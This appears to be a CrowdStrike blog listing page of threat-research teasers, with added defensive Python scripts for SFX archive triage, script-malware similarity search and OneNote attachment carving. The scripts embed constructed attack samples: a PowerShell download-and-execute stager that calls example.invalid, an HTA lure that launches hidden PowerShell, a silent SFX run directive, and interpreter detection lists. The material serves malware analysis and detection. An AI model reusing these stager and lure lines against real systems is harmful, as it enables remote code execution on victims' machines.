
CrowdStrike Brings Extended Detection and Response to New z16 and LinuxONE 4 Single Frame and Rack Mount Models

We are excited to collaborate with IBM, which today unveils its new IBM z16 and LinuxONE Rockhopper 4 single frame and rack mount models, available globally on May 17, 2023. Powered by IBM’s Telum processor, these new configurations are designed for highly efficient data centers with sustainability in mind. CrowdStrike customers can make more effective use of their data center space while remaining resilient in the midst of ongoing global uncertainty.

How Falcon OverWatch Investigates Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads

Self-extracting (SFX) archive files have long served the legitimate purpose of easily sharing compressed files with someone who lacks the software to decompress and view the contents of a regular archive file. However, SFX archive files can also contain hidden malicious functionality that may not be immediately visible to the file’s recipient, and could be missed by technology-based detections alone.
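The hidden functionality the post refers to is usually a run-after-extraction instruction stored in the archive itself rather than in the executable stub. The following triage script is an added example, not code from the original post or from CrowdStrike. It assumes two format facts that the post does not state: a 7-Zip SFX installer keeps its plaintext configuration between ";!@Install@!UTF-8!" and ";!@InstallEnd@!", with RunProgram= / ExecuteFile= directives executed after extraction and GUIMode=1 or 2 suppressing the extraction dialog; a WinRAR SFX keeps its Setup=/Silent= commands in the archive comment, which may be compressed, so only an uncompressed comment is spotted here. The sample bytes at the bottom are constructed, not a real file.

```python
"""SFX archive triage (added example; format facts per 7-Zip and WinRAR SFX docs, not the post)."""
import re

ARCHIVE_MAGICS = {
    "7z": b"7z\xbc\xaf\x27\x1c",            # 7-Zip archive signature
    "rar5": b"Rar!\x1a\x07\x01\x00",        # RAR 5.x
    "rar4": b"Rar!\x1a\x07\x00",            # RAR 1.5-4.x
}
SFX7Z_CONFIG_RE = re.compile(rb";!@Install@!UTF-8!(.*?);!@InstallEnd@!", re.DOTALL)
WINRAR_SCRIPT_RE = re.compile(rb"(?m)^(Setup|Silent|Path|Overwrite|TempMode)=")
EXEC_DIRECTIVES = ("RunProgram", "ExecuteFile", "ExecuteParameters")
# Interpreters that, when named in a run directive, usually mean "launch a script".
LOLBIN_RE = re.compile(r"(?i)\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)\b")


def find_embedded_archive(data):
    """Return (format, offset) of the earliest archive signature after the MZ stub, or None."""
    if data[:2] != b"MZ":
        return None
    hits = [(data.find(magic, 2), fmt) for fmt, magic in ARCHIVE_MAGICS.items()]
    hits = [h for h in hits if h[0] != -1]
    if not hits:
        return None
    offset, fmt = min(hits)
    return fmt, offset


def parse_7z_sfx_config(data):
    """Parse the ';!@Install@!UTF-8!' block of a 7-Zip SFX installer into a dict (or {})."""
    m = SFX7Z_CONFIG_RE.search(data)
    if not m:
        return {}
    cfg = {}
    for line in m.group(1).decode("utf-8", "replace").splitlines():
        key, sep, value = line.strip().partition("=")
        if sep:
            cfg[key.strip()] = value.strip().strip('"')
    return cfg


def triage_sfx(data):
    """Summarise what an SFX would do on the recipient's machine."""
    report = {"is_sfx": False, "archive": None, "archive_offset": None,
              "run_directives": {}, "flags": []}
    found = find_embedded_archive(data)
    if not found:
        return report
    report["is_sfx"] = True
    report["archive"], report["archive_offset"] = found
    cfg = parse_7z_sfx_config(data)
    report["run_directives"] = {k: cfg[k] for k in EXEC_DIRECTIVES if k in cfg}
    if report["run_directives"]:
        report["flags"].append("runs a program after extraction")
    if any(LOLBIN_RE.search(v) for v in report["run_directives"].values()):
        report["flags"].append("run directive invokes a script interpreter")
    if cfg.get("GUIMode") in ("1", "2"):
        report["flags"].append("silent extraction (GUIMode=%s)" % cfg["GUIMode"])
    if report["archive"].startswith("rar") and WINRAR_SCRIPT_RE.search(data):
        report["flags"].append("uncompressed WinRAR SFX script present (check Setup=/Silent=)")
    elif report["archive"].startswith("rar"):
        report["flags"].append("RAR SFX: extract and review the archive comment for SFX commands")
    return report


# Constructed sample (not a real malware file): an MZ stub, a 7-Zip SFX config that
# silently launches a batch file after extraction, then a 7z archive signature.
SAMPLE_7Z_SFX = (
    b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 64
    + b';!@Install@!UTF-8!\nTitle="Invoice"\nGUIMode="2"\n'
    + b'RunProgram="cmd /c install.cmd"\n;!@InstallEnd@!'
    + ARCHIVE_MAGICS["7z"] + b"\x00\x04" + b"\x00" * 32
)
SAMPLE_PLAIN_EXE = b"MZ" + b"\x00" * 200  # no archive appended: not an SFX

if __name__ == "__main__":
    for name, blob in (("sample_sfx.exe", SAMPLE_7Z_SFX), ("plain.exe", SAMPLE_PLAIN_EXE)):
        print(name, triage_sfx(blob))
```

The point of the report is the combination: an archive appended to an executable, a run directive naming an interpreter, and a silent GUI mode together describe a file whose visible behaviour (a decoy document appears) differs from what it actually executes. The archive offset also tells you where to carve the archive out for a separate extraction.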

CrowdStrike Falcon Platform Detects and Prevents Active Intrusion Campaign Targeting 3CXDesktopApp Customers

On March 29, 2023, CrowdStrike observed unexpected malicious activity emanating from a legitimate, signed binary, 3CXDesktopApp, a softphone application from 3CX. The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity. CrowdStrike’s Intelligence team is in contact with 3CX, and we will continue to update this post on this dynamic situation as more details become available.

CrowdStrike's Artificial Intelligence Tooling Uses Similarity Search to Analyze Script-Based Malware Attack Techniques

According to the AV-TEST Institute, more than 1 billion strains of malware have been created, and more than 500,000 new pieces of malware are detected every day. One of the main reasons for this rapid growth is that malware creators frequently reuse source code. They modify existing malware to meet the specific objectives of an attack campaign or to avoid signature-based detection.
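Because reused code survives the small edits that defeat a byte signature, similarity search compares a normalized representation of the script rather than its bytes. The following is an added example of that idea, not CrowdStrike's tooling: scripts are normalized (comments dropped, variable names and string literals canonicalized, case folded), cut into token 3-shingles, and summarized by a MinHash sketch whose agreement rate estimates the Jaccard similarity of the shingle sets. The three PowerShell snippets and the corpus names are constructed for the example.

```python
"""Shingle + MinHash similarity search over scripts (added example, not CrowdStrike code)."""
import hashlib
import random
import re

TOKEN_RE = re.compile(r"\$[A-Za-z_]\w*|\"[^\"]*\"|'[^']*'|[A-Za-z_][\w\-]*|\S")


def normalize(script):
    """Turn a script into a token list that survives renaming and re-stringing."""
    tokens = []
    for line in script.splitlines():
        line = line.split("#", 1)[0]          # drop line comments (naive: ignores '#' inside strings)
        for tok in TOKEN_RE.findall(line):
            if tok.startswith("$"):
                tokens.append("$VAR")         # variable names are free to rename
            elif tok[0] in "\"'":
                tokens.append("STR")          # so are URLs, paths and other literals
            else:
                tokens.append(tok.lower())    # PowerShell is case-insensitive
    return tokens


def shingles(tokens, k=3):
    """Set of k-token windows: order inside a window is kept, order between windows is not."""
    return {" ".join(tokens[i:i + k]) for i in range(len(tokens) - k + 1)}


def jaccard(a, b):
    return len(a & b) / len(a | b) if (a | b) else 0.0


class MinHash:
    """Random linear hash family mod a Mersenne prime. Sketches are only comparable when
    made by the same instance (same seed and num_perm)."""

    def __init__(self, num_perm=256, seed=42):
        rng = random.Random(seed)
        self.p = (1 << 61) - 1
        self.params = [(rng.randrange(1, self.p), rng.randrange(0, self.p))
                       for _ in range(num_perm)]

    def sketch(self, shingle_set):
        hashes = [int.from_bytes(hashlib.sha1(s.encode()).digest()[:8], "big")
                  for s in shingle_set]
        if not hashes:
            return [self.p] * len(self.params)
        return [min((a * h + b) % self.p for h in hashes) for a, b in self.params]

    @staticmethod
    def estimate(sig1, sig2):
        """Estimated Jaccard similarity: share of positions where both sketches agree."""
        return sum(x == y for x, y in zip(sig1, sig2)) / len(sig1)


def build_index(corpus, mh):
    """corpus: {name: script_source} -> {name: sketch}."""
    return {name: mh.sketch(shingles(normalize(src))) for name, src in corpus.items()}


def search(index, query_src, mh, threshold=0.5):
    """Rank indexed scripts by estimated similarity to the query, most similar first."""
    q = mh.sketch(shingles(normalize(query_src)))
    hits = [(name, MinHash.estimate(q, sig)) for name, sig in index.items()]
    return sorted((h for h in hits if h[1] >= threshold), key=lambda h: -h[1])


# Constructed samples. KNOWN is a generic download-and-execute stager; VARIANT is the same
# logic with renamed variables, a different URL and two added lines; BENIGN is unrelated.
KNOWN = '''$u = "http://example.invalid/a.ps1"
$c = New-Object System.Net.WebClient
$d = $c.DownloadString($u)
Invoke-Expression $d'''

VARIANT = '''# second campaign, "new" sample
Start-Sleep -Seconds 5
$ErrorActionPreference = "SilentlyContinue"
$target = "http://example.invalid/b/stage2.ps1"
$client = New-Object System.Net.WebClient
$payload = $client.DownloadString($target)
Invoke-Expression $payload'''

BENIGN = '''Get-ChildItem -Path C:\\Logs -Filter *.log |
  Where-Object { $_.Length -gt 1MB } |
  ForEach-Object { Compress-Archive $_.FullName ($_.FullName + ".zip") }'''

if __name__ == "__main__":
    mh = MinHash()
    index = build_index({"known_stager": KNOWN, "benign_admin": BENIGN}, mh)
    exact = jaccard(shingles(normalize(KNOWN)), shingles(normalize(VARIANT)))
    print("exact Jaccard known/variant:", round(exact, 3))
    print("search(VARIANT):", search(index, VARIANT, mh))
```

The variant shares every shingle of the original and adds four of its own, so the exact Jaccard is 19/23, roughly 0.83, while the two files have no byte sequence in common long enough for a conventional signature. With a sketch of 256 positions the estimate lands within a few hundredths of that; in a real index the sketches would be banded into a locality-sensitive hash so a query touches only candidate buckets rather than every stored script.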

CrowdStrike Extends Identity Security Innovations to Protect Customers and Stop Breaches

From the CISO perspective, identity security is one of the top security challenges, driven by the adversary’s increased use of stolen credentials to target and infiltrate organizations. The data bears this out: according to the CrowdStrike 2023 Global Threat Report, 80% of attacks use compromised identities, while advertisements for access broker services jumped 112% in 2022.

QakBot eCrime Campaign Leverages Microsoft OneNote Attachments

In November 2021 and February 2022, Microsoft announced that by default it would block Excel 4 and VBA macros in files that were downloaded from the internet. Following these changes, CrowdStrike Intelligence and the CrowdStrike Falcon® Complete managed detection and response team observed eCrime adversaries that had previously relied on macro execution for malware delivery adapt their tactics, techniques and procedures (TTPs).
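A OneNote attachment carries its payload as an embedded file that the recipient is lured into double-clicking, so the first triage step is to pull every embedded object out of the .one file and classify it. The script below is an added example, not CrowdStrike code. It relies on the MS-ONESTORE layout of a FileDataStoreObject (a fact not stated on the page): header GUID {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}, 8-byte little-endian length, 12 bytes of padding and reserved fields, the file bytes, then footer GUID {71FBA722-0F79-4A0B-BB13-899256426B24}; the .one file itself starts with GUID {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}. The sample section bytes and the lure text are constructed for the example.

```python
"""Carve embedded files out of a OneNote section by scanning for FileDataStoreObject GUIDs
(added example; layout per MS-ONESTORE, not taken from the post)."""
import struct
import uuid

ONE_MAGIC = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le   # first 16 bytes of a .one file
HEADER_GUID = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FOOTER_GUID = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
FDS_HEADER_LEN = 16 + 8 + 12   # guidHeader + cbLength + unused/reserved

MAGICS = [
    (b"MZ", "Windows executable (PE)"),
    (b"%PDF", "PDF"),
    (b"\x89PNG", "PNG image"),
    (b"\xff\xd8\xff", "JPEG image"),
    (b"PK\x03\x04", "ZIP / Office Open XML"),
    (b"\xd0\xcf\x11\xe0", "OLE compound file"),
]
SCRIPT_HINTS = (b"<script", b"wscript", b"cscript", b"powershell", b"mshta",
                b"@echo", b"createobject", b"<hta:")
SUSPICIOUS_TYPES = ("Windows executable (PE)", "script-like text")


def classify(blob):
    for magic, name in MAGICS:
        if blob.startswith(magic):
            return name
    head = blob[:512].lower()
    if any(h in head for h in SCRIPT_HINTS):
        return "script-like text"
    return "unknown"


def is_onenote(data):
    return data[:16] == ONE_MAGIC


def extract_embedded_files(data):
    """Return one dict per FileDataStoreObject found by scanning for the header GUID."""
    objects = []
    pos = data.find(HEADER_GUID)
    while pos != -1:
        start = pos + FDS_HEADER_LEN
        if start > len(data):
            break
        (length,) = struct.unpack_from("<Q", data, pos + 16)
        end = start + length
        truncated = end > len(data)           # bogus length: take what is there and say so
        if truncated:
            end = len(data)
        blob = data[start:end]
        objects.append({
            "index": len(objects),
            "offset": start,
            "size": len(blob),
            "type": classify(blob),
            "footer_ok": (not truncated) and data[end:end + 16] == FOOTER_GUID,
            "data": blob,
        })
        pos = data.find(HEADER_GUID, max(end, pos + 16))
    return objects


def flag_suspicious(objects):
    """Objects a reviewer should open first: executables and script-like text."""
    return [o for o in objects if o["type"] in SUSPICIOUS_TYPES]


def make_fds_object(payload):
    """Wrap payload exactly as a FileDataStoreObject is laid out (used to build the sample)."""
    return HEADER_GUID + struct.pack("<Q", len(payload)) + b"\x00" * 12 + payload + FOOTER_GUID


# Constructed sample: a decoy image plus an HTA-style lure of the kind a "click to view"
# button can sit on top of. Not a real malware sample.
PNG_DECOY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 40
HTA_LURE = (b'<html><script language="VBScript">\n'
            b'Set sh = CreateObject("WScript.Shell")\n'
            b'sh.Run "cmd /c start /min powershell -w hidden -c stage2", 0\n'
            b'</script></html>')
SAMPLE_ONE = (ONE_MAGIC + b"\x00" * 48 + make_fds_object(PNG_DECOY)
              + b"\x11" * 16 + make_fds_object(HTA_LURE) + b"\x00" * 8)

if __name__ == "__main__":
    objs = extract_embedded_files(SAMPLE_ONE)
    print("valid .one header:", is_onenote(SAMPLE_ONE))
    for o in objs:
        print(o["index"], o["type"], o["size"], "bytes, footer ok:", o["footer_ok"])
    print("review first:", [o["index"] for o in flag_suspicious(objs)])
```

Scanning for the GUID instead of walking the file's node structure is deliberate: lures are often built by hand or by tooling that does not produce a well-formed section, and the embedded script is still recoverable as long as its header GUID is intact. A length field that runs past the end of the file is reported rather than trusted.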

CrowdStrike Discovers First-Ever Dero Cryptojacking Campaign Targeting Kubernetes

CrowdStrike has discovered the first-ever Dero cryptojacking operation targeting Kubernetes infrastructure. Dero is a relatively new, privacy-focused cryptocurrency that uses directed acyclic graph (DAG) technology and claims complete anonymity for its transactions. The combination of anonymity and a higher rewards ratio makes it potentially lucrative for cryptojacking groups compared to Monero, the cryptocurrency commonly used by attackers and groups running miner operations.

How to Mature Your Threat Intelligence Program

With so many threat intelligence solutions on the market today, it raises the question: What is threat intelligence and why do you need it? I won’t go into detail about what threat intelligence is; you can read about that here. Instead, I want to focus on the threat intelligence maturity journey — specifically, how advanced your organization is with respect to threat intelligence adoption and which CrowdStrike solution may be right for you.